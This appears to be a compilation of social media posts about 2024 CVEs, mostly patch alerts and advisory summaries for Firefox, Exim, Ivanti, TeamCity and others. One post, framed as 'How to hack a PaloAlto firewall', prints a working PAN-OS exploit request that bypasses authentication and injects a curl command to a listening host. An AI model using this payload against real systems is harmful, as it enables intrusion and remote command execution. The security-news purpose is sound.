Kernel-hack-drill and exploiting CVE-2024-50264 in the Linux kernel

https://a13xp0p0v.github.io/2025/09/02/kernel-hack-drill-and-CVE-2024-50264.html

#HackerNews #KernelHack #Drill #CVE2024 #LinuxKernel #Cybersecurity #Exploit

How to hack a #PaloAlto firewall:

POST /php/utils/createRemoteAppwebSession.php/aaaa.js.map HTTP/1.1
Host: {{Hostname}}
X-PAN-AUTHCHECK: off
Content-Type: application/x-www-form-urlencoded
Content-Length: 99

user=`curl {{listening-host}}`&userRole=superuser&remoteHost=&vsys=vsys1

https://labs.watchtowr.com/pots-and-pans-aka-an-sslvpn-palo-alto-pan-os-cve-2024-0012-and-cve-2024-9474/

#CVE20240012 #CVE20249474 #CVE #CVE2024

🚨 Did you know cyber espionage groups like Earth Simnavaz can remain undetected for months, exploiting vulnerabilities like CVE-2024-30088 to target critical infrastructure? 🔒

Tip: Always patch known vulnerabilities quickly—delaying can leave systems exposed to advanced threats like these!

How do you prioritize patch management in your organization? 🤔

Dive deeper into this evolving threat on our blog: https://guardiansofcyber.com/cybersecurity-news/earth-simnavaz-cyberattacks-exploiting-cve-2024-30088-to-target-uae-critical-infrastructure-with-stealthy-backdoors/

#Cybersecurity #GuardiansOfCyber #Guardians #APT #Vulnerability #ZeroDay #EarthSimnavaz #CyberThreats #CriticalInfrastructure #CVE2024

🚨 Did you know a simple animation bug could leave your entire browser vulnerable? The latest CVE-2024-9680 exploit targets Firefox and Thunderbird, allowing attackers to execute code without you even knowing! 😨

To stay safe: Update your browser ASAP and always keep auto-updates enabled. These tiny steps make a huge difference in staying protected. 🔒

Have you ever been caught off guard by an update you didn't take seriously? Share your stories below!

Read more about the vulnerability and how to protect yourself: https://guardiansofcyber.com/cybersecurity-news/critical-cve-2024-9680-firefox-and-thunderbird-vulnerabilities-exploited-in-the-wild-patch-now-to-prevent-code-execution-attacks/

#Cybersecurity #GuardiansOfCyber #Guardians #CVE2024 #FirefoxVulnerability #PatchNow #BrowserSecurity #CyberAlert #InfoSec #StaySafeOnline

Critical Exim vulnerability affects 1.5 million servers worldwide

https://stackdiary.com/critical-exim-vulnerability-affects-1-5-million-servers-worldwide/

#Exim #Security #Vulnerability #Cybersecurity #Email #Patch #Update #Critical #Bug #MTA #Server #Protection #CVE2024 #Hacker #Threat #Safety #Admin #IT #Software #Fix #Alert #SecurityBreach #Exploits #CyberAttack #SMTP #PatchNow #ITsecurity #MailServer #Risk #Malware #CyberDefense #CVE #CISA

High-Impact Security Vulnerabilities in Firefox 128

Date: July 9, 2024
CVE: CVE-2024-6605 CVE-2024-6606 CVE-2024-6607 CVE-2024-6608 CVE-2024-6609 CVE-2024-6610 CVE-2024-6600 CVE-2024-6601 CVE-2024-6602 CVE-2024-6603 CVE-2024-6611 CVE-2024-6612 CVE-2024-6613 CVE-2024-6614 CVE-2024-6604 CVE-2024-6615
Vulnerability Type: Tapjacking
CWE: [[CWE-451]], [[CWE-922]]
Sources: Mozilla Security Advisory

Synopsis

Multiple security vulnerabilities were addressed in the latest Firefox 128 release, impacting both the desktop and Android versions. These vulnerabilities, if exploited, could lead to severe security breaches including tapjacking, out-of-bounds read, and memory corruption.

A list of all the CVEs mentioned in the Mozilla Foundation Security Advisory 2024-29:

Issue Summary

Mozilla announced fixes for several high-impact vulnerabilities in Firefox 128. Notably, CVE-2024-6606 which involves out-of-bounds read issues in the clipboard component, and CVE-2024-6609 related to memory corruption in the NSS library.

Technical Key Findings

CVE-2024-6605 allows attackers to overlay malicious prompts over legitimate permission dialogs, potentially tricking users into granting unwanted permissions. This vulnerability exploits the lack of a delay in activating permission prompts on Firefox Android, enabling immediate interactions which can be hijacked by malicious actors.

Vulnerable Products

• Firefox versions prior to 128
• Firefox ESR versions prior to 115.13
• Firefox Android versions prior to 128

Impact Assessment

If these vulnerabilities are exploited, attackers can perform actions such as reading out-of-bounds data, preventing users from exiting fullscreen mode, or executing arbitrary code. These can lead to unauthorized access to sensitive data, manipulation of browser behavior, and potential system compromises.

Patches or Workaround

Mozilla has released patches in Firefox 128, Firefox ESR 115.13, and Thunderbird 115.13 to address these vulnerabilities. Users are advised to update to the latest versions to mitigate the risks associated with these security flaws.

Tags

#Firefox #CVE2024-6605 #Tapjacking #SecurityUpdate #Mozilla #Vulnerability #MemoryCorruption #OutOfBoundsRead

Addressing the Ivanti Pulse Secure Vulnerability: A Call to Action Against Emerging Cyber Threats

https://zurl.co/IQTd
#Cybersecurity #InfoSec #IvantiPulseSecure #CVE2023 #CVE2024 #MiraiBotnet #NetworkSecurity #CyberAttack #DataProtection #SOClogix

"🚨 Urgent TeamCity Vulnerabilities Alert! Patch Now! 🚨"

JetBrains has just patched critical vulnerabilities in TeamCity On-Premises software, tagged CVE-2024-27198 and CVE-2024-27199, with alarming CVSS scores of 9.8 and 7.3. These flaws allow unauthorized access to potentially gain full control over the TeamCity servers. Versions up to 2023.11.3 are affected, urging an immediate update to v2023.11.4. Kudos to Rapid7 for the timely discovery on Feb 20, 2024. Given past abuses by notorious APT groups, securing your systems against such authentication bypasses is crucial to thwart potential supply chain assaults. 🛡️💻

🔗 Source: BleepingComputer

Tags: #JetBrains #TeamCity #CyberSecurity #VulnerabilityAlert #CVE2024-27198 #CVE2024-27199 #Rapid7 #PatchNow #SupplyChainSecurity #AuthenticationBypass #InfoSec

🌍🔐👥